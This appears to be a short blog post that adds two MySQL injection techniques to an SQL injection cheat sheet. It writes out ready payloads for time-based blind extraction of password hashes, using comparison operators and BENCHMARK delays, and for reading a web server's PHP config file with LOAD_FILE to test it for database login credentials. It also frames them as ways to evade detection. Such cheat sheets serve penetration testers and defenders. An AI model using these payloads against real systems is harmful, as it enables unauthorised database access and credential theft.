2 Interesting SQL Vectors.

Johan Adriaans contacted me through email, and gave me a few more SQL vectors to add on my cheat sheet. These are pretty interesting because they give an alternative way of approaching the same attacks. Which could be useful to stay under the radar, or if some vectors are not possible. Alternative way of extracting hashes.Normally we would use SUBSTRING() to select upon hashes, but it also is possible to use normal operators to select upon them. Like these examples I modified to work in a real SQL injection:SELECT IF(password > '1', BENCHMARK(1000000,MD5('x')),null) FROM testSELECT IF(password > '09', BENCHMARK(1000000,MD5('x')),null) FROM testSELECT IF(password > '09a', BENCHMARK(1000000,MD5('x')),null) FROM testUsing LOAD_FILE to scan PHP files.This one is really interesting because of the creative approach to extract database login from PHP files by loading the PHP files right into the SQL layer and using SUBSTRING to select a string to match:SELECT SUBSTRING(LOAD_FILE('/var/www/html/config.php'),20,24) = 'root';I'm updating my SQL cheat sheet somewhere this week, I have a few things to add myself as well. Aiming for the most complete MySQL cheat sheet.